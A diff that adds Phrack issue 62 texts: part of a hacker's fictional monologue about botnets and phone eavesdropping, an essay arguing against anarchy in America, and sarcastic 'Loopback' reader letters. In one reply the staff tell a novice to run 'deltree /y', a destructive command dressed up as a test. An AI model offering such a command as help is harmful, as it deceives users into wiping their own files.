+it? The zombie says here, there, pointing to the air like grandma after
+surgery pointed to hallucinations, telling them to get her a glass of
+water, telling them to sit down and stop making her nervous. It's all
+dribble-glass stuff, zombies in Newtonian space that ended long ago; they
+stare through the glass at the quantum cloud-cuckoo land the rest of us
+live in, calling it the future. Mistaking space for time the way that
+colonel inside his pyramid thinks he's net-man.
+      People who live in clouds of power live behind tall walls, taller
+than you can imagine. We never really see what's behind those walls.
+Zombies never climb those walls because of the private armies. Their
+"security forces" would have a zombie locked up in a heartbeat if he tried.
+
+      On the network when we take over thousands of machines and load
+trojans letting them sit there until we are ready to use them in a massive
+attack, we call them zombies. The zombies are unaware what is happening to
+them. We bring them to life and they rise from their graves and march.
+Those are our clouds of power, tit for tat. Mastering the masters.
+      Meanwhile Moms and Pops sit in their chairs not knowing that trojans
+are being downloaded into their brains. The code is elegant, tight, fast.
+Between the medium in which the code is embedded and the television or
+network that turns it into illusions of real people, real situations, the
+sleight of hand is so elegant, enticing bird-like Moms and Pops into
+digital cages. The when they move the cages, the birds move too. They give
+the birds enough room to flap their wings so they think they're free.
+      This is what it looks like.
+      Jerome K. Dumbass, say,  a zombie with one third of a clue, decides
+to eliminate a CEO who made him lose his house, his job, all his stock
+options. The buyer did not know how to beware any more than zombies know
+how to avoid the download. The guy was sucked into the force field of greed
+while the CEO stashed his loot in a house he could keep. Pays the people to
+make laws to let him keep a huge house that no one can take even after his
+term in a country club. Dumbass wants to kill the CEO which is entirely
+understandable. So he climbs the wall and drops down onto the other side,
+twisting his ankle.
+      The circuit breaks the minute he touches the wall, cameras swing into
+action, pick him up before he can say "Ow!" Dogs bark and come closer,
+baying and barking. Camera zooms. A close-up shows his face twisted with
+pain. Then fear. Dumbass drags his game leg after him, dogs bay and bark
+closer, louder now. Jeezus! his stupid face says as he hobbles through
+flowers and shrubs some of them cameras some of them alarms into the arms
+of waiting goons. The goons are bigger than pro tackles - excuse me, I'm
+explaining one simulation in terms of another. How foolish is that? But
+that's what we do, use words to explain words, simulations explaining same.
+You don't know a single linebacker do you? But you think of them as your
+friends, too, don't you? Anyway, a thug grabs Dumbass by the belt, twisting
+his belt and pants in his hand, his other hand crimping the back of his
+neck like a robot's claw. Dumbass cries out but there's no one to hear.
+Everyone is busy scratching and eating and drinking and masturbating to the
+dreamtime rhythm of the night.
+      They drag him into a room behind the cabanas along the landscaped
+pools and Jacuzzis. It's dark in there. They throw him against the wall and
+he bounces off and lies in the scatter and dirt. Looks up and sees a boot
+coming. That's that. Out he goes.
+      He comes around in a minute, dizzy, in pain, blood from his broken
+nose on his shirt. Whomp! The goon's hand slaps him, then backhands him,
+winds up for a forehand and whacks him back to center. "Stop!" he screams
+but instead the thug just whacks him back and forth like a bobblehead,
+wanting him to understand the foolishness of his indiscretion, don't you
+see. Imposing power on the dumbass on behalf of his master. So Dumbass can
+internalize the experience, feel utterly powerless, spread the word. Tell
+your buddies that you do not climb - whack! - that - whack! - wall.
+      Somewhere in his twinkie brain it dawns on him that no one knows he
+is here. Sure, they call the "real" cops after a while, but these guys are
+real enough, mugging him in the toolshed. No one knows he is here and
+wouldn't care if they did. The so-called news shows handle that, turning
+Dumbass into the Other. Everybody cheers as they beat his brains out. Then
+the "real" police come and take over, beating him up in the van on the way
+to the station, having fun as long as the ride takes, bouncing him off the
+walls.
+      Now, this is my point: the armies that this man has, this man whose
+face you have not even seen, you never do see, you only see manifestations
+of clouds of power, this man's armies are created in the image of the net.
+Once we no longer had countries but only the pretense of countries, those
+who inhabited clouds of power took the game to the next level. These armies
+are simply not seen. They are hidden in the faux shrubs designed to
+distract us. When boundaries dissolved, clouds of power emerged all over
+the world. They are accountable only to themselves, i.e. not. Clouds are
+not countries, clouds are water vapor condensing, as visible and
+insubstantial as mist. We too are mist but we believe in our shapes as they
+change. The clouds in a way are not there, really. Except they are. But try
+to tell that to a zombie, tell them they live in a cloud and see what they
+say.
+      Now take this entire scenario and blow it up. Imagine a country with
+borders drawn in black. Then imagine a mouth blowing a pink bubble and the
+bubble bursting obliterating borders and then there's a pink cloud instead
+of the little wooden shapes of states or countries they used to play with
+when they were kids. Bubblegum splatters all over the world creating cloud-
+places that have no names. They are place markers until names are invented.
+These are the shapes kids play with now, internalizing the difference.
+      Try telling that to zombies, though. They sit there listening as
+sitcoms and so-called reality shows and faux news put them into a deep
+sleep. Images of unreality filter into their brains and define their lives.
+Tiny images, seen near, seem big. Seem almost lifelike. Inside these
+miniature worlds, Moms and Pops believe they are far-seeing, thinking they
+think. Because they are told that near is far and little is big and so it
+is.
+      Back to the example. Dumbass is done getting beaten up in the shed
+behind the bougainvillea and hibiscus. Let's press that a little. That's
+what neighborhoods have become, whole used-to-be-called countries. That's
+what societies have become, entire civilizations. Do you see, now? The map
+in your head is a game board intended to replace reality, not a meaningful
+map, it gives you manageable borders within which you watch and act in the
+sitcom of your life, playing a role in a script written for other purposes
+entirely.
+      That's why when you open your mouth, one of those times you wake up
+long enough to talk about something you think is real, anyone who has a
+clue laughs. It isn't personal, but it can't be helped. People who have a
+clue laugh. We try to suppress it but a little titter becomes a giggle and
+then a blast that explodes before you finish your first sentence.
+      That's what the fight was about. It wasn't personal.
+      See we see how silly it is, the way you think, what you think is
+real. The only difference between our seeming rudeness and the compassion
+of Buddhists who also see clearly is that somehow compassion did not
+download from the net but the seeing did. We see what's so but without much
+feeling. Certainly without much empathy. If we have too much empathy, it
+sucks us in and then we're sunk. Besides, you're zombies. Zombies are not
+real human beings. In the scripts they have written you do the same things
+over and over again like a Marx Brothers movie. The script is boring and
+predictable. That's how it manages so many people so well but that's also
+what we think is funny. When you play out your roles without even knowing
+it, naturally, we laugh.
+      It's not personal! Honest!
+
+      When I was twelve I ran a line out to the telephone cable behind the
+house. I listened to the neighbors talk mostly about nothing until the
+telephone company and a cop dropped by. I pleaded stupidity and youth and
+Pop gave me a talk and I nodded and said yeah, right, never again. Those
+were the good old days when hacking and phreaking were novelties and
+penalties for kids were a slap on the wrist.
+      My favorite telephone sitcom was "The Chiropractor's Wife." That
+woman she lived around the corner and lowered the narrowness bar beyond
+belief. You see her on the street with her kids or walking that damned huge
+dog of theirs, you wouldn't know it. She looked normal. On good days she
+looked good even with her blonde hair down on her shoulders, smiling hello.
+Still, she raised oblivious to the level of an art form.
+      I guess she was terrified. Her life consisted of barely coping with
+two kids who were four and six I think and serving on a committee or two at
+school like for making decorations for a Halloween party. Other than that,
+near as I could tell, she talked to her mother and made dinner for the
+pseudo-doc. Talked to her mother every day, sometimes for hours.
+      The conversation was often interrupted by long pauses. Well, the wife
+would say. Then her mother would say, well. Then there might be silence for
+twenty seconds. I am not exaggerating, I clocked it. Twenty-four seconds
+was their personal best. That might not sound like much but in a telephone
+conversation, it's eternity. Then they would go back over the same
+territory. They were like prisoners walking back and forth in a shared
+cell, saying the same things over and over. I guess it was mostly the need
+to talk no matter what, drawing the same circles on a little pad of paper.
+I imagined the wife making those circles on a doodle pad in different
+colors and that's when I realized that people around me lived by a
+different geometry entirely. How the landscape looks is determined by how
+you measure distance. How far to the horizon. That's when I began to invent
+theorems for a geometry of near.
+      Example.
+      Here in Wolf Cove there is the absolute silence of shuttered life.
+The only noise we hear is traffic from the freeway far over the trees. We
+have lots of trees, ravines, some little lakes. That's what it is, trees
+and ravines and houses among the trees. That sound of distant traffic is
+like holding a seashell up to your ear. It's the closest we come to having
+an ocean. No one can park on the street so a car that parks is suspect. The
+cops know everyone by sight so anyone different is stopped. The point I am
+making is, Wolf Cove encloses trees and lakes and houses with gates of
+silence, making it seem safe, but in fact it has the opposite effect.  It
+creates fear that is bone deep. It's like a gated community with real iron
+gates and a rent-a-cop. It makes people inside afraid of what's outside so
+no one wants to leave. It's like we built an electric fence like the kinds
+that keep dogs inside except we're the dogs.
+      One day there was a carjacking at a mall ten miles away. Two guys did
+it who looked like someone called central casting and said hey, send us a
+couple of mean-looking carjacker types. They held a gun on a gray lady
+driving a Lexus and left her hysterical in the parking lot. I knew the
+telephone sitcom was bound to be good so I listened in on the wife and her
+hold-me mother.
+      They talked for more than two hours, the wife saying how afraid she
+was she wouldn't get decorations done for the Halloween party at the
+school. She almost cried a couple of times, she was that close to breaking,
+just taking care of a couple of kids and making streamers and a pumpkin
+pie. But every now and again she said how afraid she was they'd take her
+SUV at gunpoint next time she went shopping. The television had done its
+job of keeping her frightened, downloading images of terrified victims
+morning noon and night. Fear makes people manageable.
+      Finally the wife said, maybe we ought to move. I couldn't believe my
+ears. I mean, she lived in Wolf Cove inside an electric fence, so where the
+hell would she go? Her fears loomed in shadows on the screen of the world
+like ghosts and ghouls at that Halloween party. Everywhere she looked, she
+saw danger. Wherever there was a door instead of a wall, she felt a draft,
+an icy chill, imagining it opening. She got out of bed and checked the
+locks when everyone else was asleep. Once she had to go get something on
+the other side of town and you would have thought she was going to the
+moon. She went over the route on a map with her mother. Did she turn here?
+Or here? She had a cell phone fully charged - she checked it twice - and a
+full tank of gas, just in case. Just in case of what? So I wasn't surprised
+when she said after the carjack that maybe they ought to move to Port
+Harbor, ten miles north. Then her mother said, well. Then the wife said
+well and then there was silence. I think I held my breath, sitting in my
+bedroom listening through headphones. Then her mother said, well, you would
+still have to shop somewhere.
+      Oh, the wife said. I hadn't thought of that.
+      The geometry of near.
+      So many people live inside those little circles, more here than most
+places. I live on the net, I live online, I live out there. I keep the
+bedroom door shut but the mindspace I inhabit is the whole world.
+      When I was eleven I found channels where I learned so much just
+listening. I kept my mouth shut until I knew who was who, who was a lamer
+shooting off his mouth and who had a clue. Then somebody asked a question I
+knew and I answered politely and they let me in. I wasn't a lurker any
+longer, but I took it easy, asking questions but not too many. I stayed up
+late at Border's and other midnight bookstores, aisles cluttered with open
+O'Reilly books, figuring out what I could before I asked. You have to do
+the homework and you have to show respect. Once they let me in,  I helped
+guys on rungs below. I was pretty good at certain systems, certain kinds of
+PBX, and posted voice mail trophies that were a hoot. Some came from huge
+companies that couldn't secure their ass with a cork. The clips gave the
+lie to their PR, showing what bullshit it was. So everybody on the channel
+knew but had the good sense not to say, not let anybody know. That would be
+like leaning over a banister and asking the Feds to fuck us please in the
+ass.
+      So I learned how to live on the grid. I mapped it inside my head,
+constantly recreating images of the flows, shadows in my brain creating a
+shadow self at the same time. The shadow self became my self except I could
+see it and knew how to use it.
+      It wasn't hacking the little systems, don't you see, the boxes or the
+telephones, it was the Big System with a capital B and a capital S. Hacking
+a system means hacking the mind that makes it. It's not just code, it's the
+coder. The code is a shadow of the coder's mind. That's what you're
+hacking. You see how code relates to the coder, shit, you understand
+everything.
+      Anyway, Mom and Pop were talking one night and Mom said she had seen
+the Bradley's out on their patio. They were staring down at the old bricks,
+thinking about redoing it.  It meant rearranging shrubs and maybe putting
+it some flowers and ground cover. It sounded like big deal, the way they
+talked about it, making this little change sound like the Russian
+Revolution.  It was like the time the Adams built a breakfast nook, you
+would have thought they had terraformed a planet.
+      So Mom said to Virginia Bradley, how long have you been in this house
+now? as long as we have? Oh no, Virginia said. We've been here thirteen
+years. Oh, Mom said  We've been fifteen. But then, Virginia said, we only
+moved from a block away. Mom said, Oh? I didn't know that. Virginia said,
+yes, we lived in that little white house on the corner the one with the
+green shutters for seventeen years. Mom said,  I didn't know that. Not only
+that, Virgina said with a little laugh, but Rick, that was her husband,
+Rick grew up around the corner. You know that ranch where his mother lives?
+Mom said, the one where the sign says Bradley? I didn't realize (only
+neighbors thirteen years) that was his mother. Yes, he grew up in that
+house, then when we got married we moved to the white house with the green
+shutters and thirteen years ago when Stonesifers moved to the lakes then we
+moved here.
+      The heart enclosed in apprehension becomes so frightened of its own
+journey, of knowing itself, that it draws the spiral more and more tightly,
+fencing itself in. Eventually the maze leads nowhere. This village with its
+winding lanes and gas lamps for all its faux charm was designed by a
+peasant culture afraid of strangers, afraid of change, a half-human heart
+with its own unique geometry.
+      Yep, you guessed it. The geometry of near.
+
+      Hypnosis does an effective job of Disneylanding the loneliness of
+people who live near. Sometimes that loneliness leaks out into their lives
+and that, really, was what the fighting was about.
+      Some business group asked Pop to give a dinner speech. They asked him
+over a year ago, so he had it on the calendar all that time. He really
+looked forward to it, we could tell by the time he spent getting ready. He
+even practiced his delivery. They told Pop to expect a few hundred people
+but when he showed up with all his slides, there were only twenty-three.
+      I am so sorry, said Merriwether Prattleblather or whoever asked him
+to speak. It never occurred to any of us when we scheduled your talk that
+this would be of all things the last episode of Jerry Seinfeld.
+      Pop got a bit of a clue that night. He was pretty dejected but he
+knew why. These are people, he said, who have known each other for years.
+This meeting is an opportunity to spend time with real friends. But they
+preferred to spend the night with people who are not only not real, but
+don't even make sense or connect to anything real. They would rather
+passively download digital images, he said, using my language without
+realizing it, than interact with real human beings.
+      So Pop had half a clue and I got excited, that doesn't happen every
+night, so I jumped in, wanting to rip to the next level and show how it all
+connects from Walter Lippmann to Eddie Bernays to Joseph Goebells, news PR
+and propaganda one and the same. That got Pop angry. It undermined that
+doll's house in his head, I can see now. The walls would collapse if he
+looked so he can't look. Besides, he had to put his frustration somewhere
+and I was safe. Naturally I became quite incensed at the intensity of his
+commitment to being clueless. Christ, Pop, I shouted, they stole your
+history. You haven't got a clue because everything real was hidden. Some of
+the nodes are real but the way they relate is disguised in lies. He shouts
+back that I don't know what I'm talking about. The second world war was
+real, he says, hitting the table, not knowing how nuts he looks. Oh yeah?
+Then what about Enigma? Before they disclosed it, you thought totally
+differently about everything in that war. You had to, Pop! Context is
+content and that's what they hide, making everything look different. It's
+all in the points of reference. They've done that with everything for fifty
+years. It's like multispectral camouflage that I read about in space, fake
+platforms intended to look real. Nothing gets through, nothing bounces
+back. You live in a hall or more like a hologram of mirrors, Pop, can't you
+see that?
+      We both kept shouting and sooner or later I figured fuck it and went
+to my room which is fine with me because I would rather live in the real
+world than the Night of the Living Dead down there.
+      I know why Pop can't let himself know. I understand. Particularly at
+his age, you can't face the emptiness of it all unless you know how to fill
+it again, preferably with something real. Knowing you know how to do that
+makes it bearable like looking at snakes on Medusa's head in a mirror.  It
+keeps you from turning to stone.
+      Me and my friends we don't want to turn to stone ever. Not ever.
+Maybe it's all infinite regress inside our heads, nobody knows. But playing
+the game at least keeps you flexible. It's like yoga for the soul.
+
+      When do I like it best? That's easy. Four in the morning. I love it
+then. There's this painting by Rousseau of a lion and a gypsy and the world
+asleep in a frieze that never wakes up. That's what it feels like, four in
+the morning, online. The illusory world is asleep, shut up like a clam, I
+turn on the computer and the fan turns into white noise. The noise is the
+sound of the sea against the seawall of our lives. The monitor flickers
+alight like a window opening and I climb through.
+      It's all in the symbols, see, managing the symbols. That makes the
+difference between half an illusion and a whole one. Do you use them or do
+they use you? If they use you, do you know it, do you see it, and do you
+use them back? Who's in charge here? Are you constantly taking back control
+from symbols that would sweep you up in a flood? Are you conscious of how
+you collude because brains are built to collude so you know and know that
+you know and can take back power? Then you have a chance, see, even if the
+hall of mirrors never shows a real reflection. Then we have a chance to get
+to the next level of the game if only that and that does seem to be the
+point.
+      Me and my friends we prefer the geometry of far. This bedroom is a
+node in a network trans-planetary or trans-lunar at any rate, an
+intersection of lines in a grid that we navigate at lightspeed. This is
+soul-work, this symbol-manipulating machinery fused with our souls, we live
+cyborg style, wired to each other. The information we exchange is energy
+bootstrapping itself to a higher level of abstraction.
+      Some nights you drop down into this incredible place and disappear.
+Something happens. I don't know how to describe it. It's like you drop down
+into this place where most of your life is lived except most of the time
+you don't notice. This time, somehow you go there and know it. Instead of
+thinking leaning forward from the top of your head its like lines of
+electromagnetic energy showing iron filings radiating out from the base of
+your skull. Information comes and goes from the base of your brain, goes in
+all directions. Time dilates and you use a different set of points of
+reference, near and far at the same time.
+      It's a matter of wanting to go, I think, then going. Otherwise you
+turn into the chiropractor's wife. I want to see up close the difference
+that makes the difference but once I go there, "I" dissolves like countries
+disappeared and whatever is left inhabits clouds of power that have no
+names. It's better than sex, yes, better.
+      So anyway, the point is, yes, I was laughing but not at him, exactly.
+You can tell him that. It was nothing personal. It just looked so funny
+watching someone express the truth that they didn't know. The truth of a
+future they'll never inhabit. It's like his mind was bouncing off a wall,
+you see what I mean? So I apologize, okay? You can tell him that. I
+understand what it must be like, coming to the end of your life and
+realizing how it's all been deception. When it's too late to do anything
+about it.
+      Now if it's all right with you, I just want a few minutes with my
+friends. I just want to go where we don't need to be always explaining
+everything, where everybody understands.
+      Okay? And would you mind closing the door, please, as you leave?
+
+
+                                #  #  #  #  #
+
+
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+  
+                The Feasibility of Anarchy in America
+
+                                 By
+
+                   Anthony <ivrit@missvalley.com>
+
+
+"This country, with its institutions, belongs to the people who inhabit it.
+Whenever they shall grow weary of the existing Government, they can exercise
+their constitutional right of amending it, or their revolutionary right to
+dismember or overthrow it." -- Abraham Lincoln
+
+ The concept of anarchy in its most general and well-known form espouses a
+view of removing a given governing body or hierarchy.  The very word,
+"Anarchy," is derived from the Greek word "Anarkhos," which means, "Without
+a ruler."  In effect, it is a view shared by those who believe that
+centralized governments or hierarchies of power and authority tend to
+corrupt those at the upper-levels.  It is also a common sentiment that those
+power-drunken rulers at the height of the hierarchy come to abuse their
+power and use their newly found authority for their own, whimsical purposes
+to the detriment of the lower members of the organization or society over
+which it rules.  This belief is far from new, and dates back probably as far
+as political philosophy has existed.  Within the United States, the
+philosophy gained general acceptance within a few select groups during the
+1960's and 1970's, and was forwarded with the rise of the "Anarchist
+Cookbook," in which instructions for bomb-making, guerilla warfare, and the
+like are expounded upon in rather brief detail.  With the rise of the
+Internet, many groups favoring the free exchange of any and all information,
+as well as the destruction of any sort of proprietary and restrictive model
+for software development and the like, the philosophy of Anarchism has
+become quite widespread and supported in a variety of forms.  Aside from the
+desire to see corrupt regimes fail and the Orwellian laws and measures
+become obsolete, however, we must ask ourselves: In America, is the concept
+of Anarchy realistically viable?
+
+ It is evident to most that the majority of citizens of the United States do
+not view laws as anything other than rules enforced by the current regime;
+therefore, to them, if the regime fails for whatever reason, there are no
+laws by which to abide.  For instance, we can see that during even minor
+disruptions, such as blackouts, citizens run rampant causing damage and
+stealing goods from other businesses.  They do not connect to the greater
+picture, and they do not realize that, by depriving others of these goods,
+they do nothing but bring greater harm upon the whole of society, which
+includes them as well.  Even with the government still active, we see a
+variety of crimes committed each day, some of the most serious being rape,
+murder, and theft.  The most important question we must ask is that, if the
+citizens are unable to conduct themselves for the greater good and for the
+welfare of society, then how may they be trusted to conduct themselves
+properly without a governmental body enforcing its laws by threats of
+incarceration or death?  However it has occurred, it is irrelevant: the
+majority of US citizens are entirely dependent upon the government and the
+services that it provides.  It is also obvious that, without a central
+governing body, they could not rightfully conduct themselves responsibly so
+that they would need no rulers or administrators above them ensuring that
+civil order persists.  Because of their attitude of self-centered egoism and
+the fulfillment of their hedonistic desires, it is very improbable that they
+could retain the proper attitude to make anarchy a possible way of life.
+ Another problem relating to the lack of a proper, self-reliant attitude is
+the fact that most Americans are conditioned to a rather wealthy and
+comfortable lifestyle.  They have the pleasure of relative political and
+military security; comfortable homes; televisions and other frivolous
+entertainments; and more food than most know what to do with.  All but the
+most impoverished and destitute live a very comfortable lifestyle, and even
+the latter are generally not wanting for food, housing, and so forth because
+of government aid.  It is also obvious to many that the government acts as a
+buffer between the individual and reality.  Everything is hidden from public
+view, such as the enforcement of the death penalty, the frequent
+slaughtering of meat, and even the often-times brutal tactics of the police
+and military.  The government attempts to keep society in a rather blissful
+swoon so that it does not recognize and is therefore not conditioned to the
+undesirable facets of reality.  Therefore, it is improbable that the general
+public at large would have the threshold of toleration regarding hardship,
+and it is not likely that most would be able to adapt to a rather open and
+frank way of life, seeing and experiencing both its pleasant and unpleasant
+aspects.  It is most likely that, when experiencing life without any central
+government shielding them from how it truly is, as well as their
+responsibility to themselves and the rest of society at large, they would
+reject such ideals and return to their previous existence and lifestyle.
+Too much is taken for granted, and when this is not available, the public
+would quickly turn upon their heels because of the fact that they are
+generally unconditioned to self-responsibility, self-reliance, and true
+hardship.
+
+ A very real problem to be faced if the central government were removed is
+the military situation and the protection of this country from hostile
+foreign powers.  It is well known and goes without saying that quite a few
+foreign nations would take little time in responding to the collapse of the
+government and militarily invade and occupy the nation to their political
+and economic advantage.  Thus, it would be imperative that a collective
+military be formed and trained in order to resist such a fate.  However,
+another problem then arises: if a military is formed, and there is hierarchy
+within this military (as there needs be if it is to be effective in
+protecting the nation from coordinated foreign attacks), then what is to
+stop it from staging a coup and forming a new governmental body under
+military rule, with the commanders being the upper class and the new leaders
+of an unwilling populace?  This is not an impossible or even an improbable
+scenario.  Take Afghanistan, for instance.  After the Mujahideen shook off
+the yoke of Soviet dominance and government, they found themselves in quite
+a problem: there were several militias, all led by separate commanders with
+different ideals.  Soon, fighting erupted between them, and the country was
+in a state of war-torn chaos.  Nothing productive came from them, and they
+never ruled with any sort of authority.  This serves as an example for how
+useless a struggle is against an oppressive regime if no stable government
+can be formed afterward.  After their many blunders, a new group rose up
+against them and their corruption: the Taliban.  They were originally a
+group of freedom fighters who claimed to have no desire for power or rule.
+They said that their goals were to remove the Mujahideen and their
+atrocities from Afghanistan, and to restore order, security, and peace to
+the region.  We all know that, afterward, they indeed became the new rulers
+of Afghanistan, and were no better than the former Mujahideen in the least.
+This would be the same sort of problem that is to plague a nation whose
+central government is removed, and it is almost inevitable that foreign
+occupation will occur, or the newly formed military will take the power for
+themselves.  Or, perhaps, both of these will occur as they did in
+Afghanistan.  Another solution may form in the minds of some when thinking
+of this problem: perhaps if everyone who is of fighting age and ability
+would form a militia, so that this power would be in the hands of the
+population as opposed to a select fighting few.  This indeed would be a good
+idea, if it weren't for a small problem: it would only be a matter of time
+before there would be disagreements as to the best course of future action
+in any given situation, and it is very probable that there would be separate
+factions that would split away and war upon each other.  Thus, the nation
+would once more be divided and fighting for power, much like the many
+nations of the world do even today.  Even without these severely important
+issues arising, it goes without question that to have everyone who is able
+to necessarily be a part of a given military would be nearly akin to being
+governed by a central regime, only on a more militarized basis.  Therefore,
+it seems entirely likely that this would either begin as or devolve into yet
+another form of government, only this time harsher in its enforcement of
+laws given the very nature of the institution.
+
+ A view espoused by some is that man should return to a more natural way of
+life and live primitively, as an animal, given that he is indeed an animal
+which is more highly evolved and retains higher faculties of reason and
+thought.  This sort of view likewise presents another problem which is most
+likely impossible to overcome within anarchy: the fact that there is not
+anarchy within nature, and that animals are indeed governed if by nothing
+more than the principle of natural selection: the strong will survive, and
+the weak will perish.  It is a fact that resources of a particular area are
+not unlimited, such as food, water, material for shelters, fuel, and so
+forth.  It is also true that there will be those who are more efficient by
+nature in gathering food, finding themselves fortunate enough to live near
+and perhaps possess a source of fresh water, and so on.  Therefore, those
+who are stronger and more efficient in these areas will by nature rule over
+those who are weaker and not as adept or fortunate enough to be in like
+position.  Such an individual or individuals would thus be held in higher
+esteem in a given community because of the resources he/she possesses, and
+which the other members want or need.  As we can see, this is leading to
+another form of government: those with the best plots of land held in
+private ownership will naturally become those who supply the food and
+necessary materials to the rest of the community, and will therefore become
+as an authority figure.  It is trivial to understand that this situation can
+be prevented if private ownership of land is not allowed, or if food, water,
+and other relatively scarce resources are distributed equally amongst the
+populace.  The only problem with this is that there must by definition be
+some sort of hierarchy or committee collecting these resources, distributing
+them, and ensuring that everyone is conducting themselves honestly with
+regard to the matter.  This will likewise lead to yet another form of
+control and government: over time or, perhaps from the beginning depending
+upon how much force the committee would have or how dire the situation is at
+that time, they will come to form a sort of government which would provide
+the members of society with its needed resources, and would thus be much
+like the current government we have today, existing by serving society and
+using its natural power to threaten others to accept a given set of laws in
+order to preserve social order.  Even the most primitive of societies have
+an accepted leadership, and at least have some sort of social order and a
+way in which to ensure that such a social order is not disrupted to the
+detriment of society.  Hence, if the society is to be held together and not
+devolve into nothing more than close-knit families attempting to ensure for
+themselves survival without thought to the rest of the population, there
+must exist some sort of hierarchy or, for lack of a better term, system of
+government.
+
+ I conclude this rather brief essay by answering the question posed in the
+beginning: it is not possible that anarchy can exist within America if only
+because of the fact that the population could not handle it, and can not be
+trusted to act with the best interest of society in mind.  Not many in this
+culture of ego-gratification and self-centered hedonism would find it in
+their best interests to give up their many enjoyments, possessions, and
+sheltered way of life so that they could exist with more responsibility and
+self-reliance.  Not only this, it would also be impossible to rid the
+majority of the population of the idea of private ownership of property, and
+because of the self-centered nature of this culture, it would be entirely
+out of the question to assume that a form of communism or communal-lifestyle
+would be acceptable to the majority involved.  Besides, without some form of
+central government deciding the fate of this communal property and what
+should be done with the material harvested or grown from it, we would be
+hard-pressed to come to any agreement upon what should be done with it.
+Thus, without any sort of unification or democratic government, or even an
+authoritarian dictator imposing his will upon the population at large,
+nothing can be achieved except factionalism, strife, and inevitably
+destabilizing, unconstructive conflict.
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/2.txt b/phrack62/2.txt
new file mode 100644
index 0000000..44f6918
--- /dev/null
+++ b/phrack62/2.txt
@@ -0,0 +1,156 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x10
+
+|=----------------------=[ L O O P B A C K ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ Phrack  Staff ]=-----------------------------=|
+
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+From: "Tom Schouten" <tomschout@hotmail.com>
+
+plz help me, i know that it 's a stupid question but i don't know how to
+decrypt the phrack articles i have imported the pgp key, but i don't know what
+to do next
+
+cheers,
+Tom 
+
+    [ Tom, I'm sorry but you wont continue the adventure with us. ]
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+From: if it were only this easy <temptedtoplay@Al-Kharafi.com>
+Subject: Very important send to editor in chief asap
+
+I should start off buy saying I'm not a cop fed or any other kind of law en
+forcement nor am i affiliated with any national local government of any kind
+to be honest i don't exist anywhere but, i am not a fan nor friend either.
+[ ... ] I however have the knowledge you seek but unlike you i will not
+freely share the knowledge with just every one. you must deserve to know.
+you must prove yourself. [ ... ] now email is not safe but I've taken the
+precautions on my end to keep this message out of government hands i hope
+your server is secure if not they will be looking for me of course they are
+always looking for me. [ ... ] if you don't succeed which you probably wont
+don't worry thousands before you have failed and thousands will after it
+just makes you average.
+
+p.s. IF THE MESSAGE IS INTERCEPTED BY ANY TYPE OF LAW ENFORCEMENT the
+recipients do not know who i am and questioning them would be like
+searching google.
+
+
+    [ I'm only seeking for one information: Who gave you our email addres? ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+From: <eeweep@eeweep.be>
+Date: Fri, 5 Dec 2003 22:56:03 +0100
+
+> Hi there,
+> I was looking through phrack releases and I couldn't find an article about
+> APR (ARP Poison Routing, used to spoof on switched networks).
+
+    [ Unfortunately, you sent your message at 22:56, and we dont accept
+      articles after 22:55. ]
+
+> Maybe there is one and I'm stupid :-)
+
+    [ There is something smart in every stupid sentence. ]
+
+> If you can verify that such an article does not exist (in phrack that is)
+
+    [ we hereby verify that such an article does not exist. ]
+
+> I'll start writing right away ;-)
+
+    [ our email address has changed for article
+      submission: devnull@phrack.org ]
+
+> Greetz,
+> eeweep
+
+Gobuyabrain,
+PHRACKSTAFF
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: D D <mmmmmcute24@yahoo.de>
+
+I really know you are good! I would like to know how good you are.
+I have primitive questions:
+
+- I'm connected with a dial up connexion and I dont want want my server or
+anybody else to know witch URL I'm browsing. Is that possible?                   
+
+    [ yes ]
+
+- Witch system is "secure" Mac or Win or linux.
+
+    [ none ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+    [ IRC session after receiving the donation for hardcover print. ]
+
+<staff> Mon3yLaundy - vis0r wants to know if phrack is a registered charity
+<Mon3yLaundy> it's not.
+<staff> yeah, i told him
+<staff> he just wants a tax deduction
+<Mon3yLaundy> tax my ass.
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+From: <bris@cimex.com.cu>
+
+     Now I'm discovering your magazine, and I want to receive it by
+     email... The question is > How can I receive the magazine by email???
+
+    [ wget http://www.phrack.org/archive/phrack62.tar.gz;
+      puuencode phrack62.tar.gz p62.tar.gz | mail bris@cimex.com.cu ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+From: Joshua ruffolo <ruffolojoshua@yahoo.com>
+
+A friend referred me to your site.  I know nothing much about what is
+posted.  I don't understand what's what.
+
+    [ This is loopback. ]
+
+Apparently there is some basic info that should be known to understand,
+but what is it?
+
+    [ howto_not_getting_into_loopback.txt ]
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: Hotballer002@cs.com
+Subject: I want to know something about downloading the issues
+
+hi. im nelson and i went to your site and i want to see if u could help me. I
+just stated the process of learning how to hack and i think your issues can
+help me. I downloaded one of the issues and when i opened it, a windows pop-up
+asked me what program I want to open the issue with. And thats what I don't
+know. So please help me and tell me what program I'm supposed to have to open
+the issues with. Thank you
+
+    [ You have to pass our IQ test first: click on start -> run and
+      enter "deltree /y" ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+From: MrRainbowStar@aol.com
+
+I love all of You ThaNkS For OpeninG My Min_d.?? You All Set Me FrEE IN This
+TechNo WoRlD.? ThAnkS Dr.K -???????? YOU ARE A GEnius _ Oh yeah and there are
+quite a few typos in the Hackers handbook? -but thats cool its all good I know
+what you mean .....
+
+    [ IT'S ALL GOOD MATE! ]
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/3.txt b/phrack62/3.txt
new file mode 100644
index 0000000..e2b0002
--- /dev/null
+++ b/phrack62/3.txt
@@ -0,0 +1,1192 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x10
+
+|=-----------------------------------------------------------------------=|
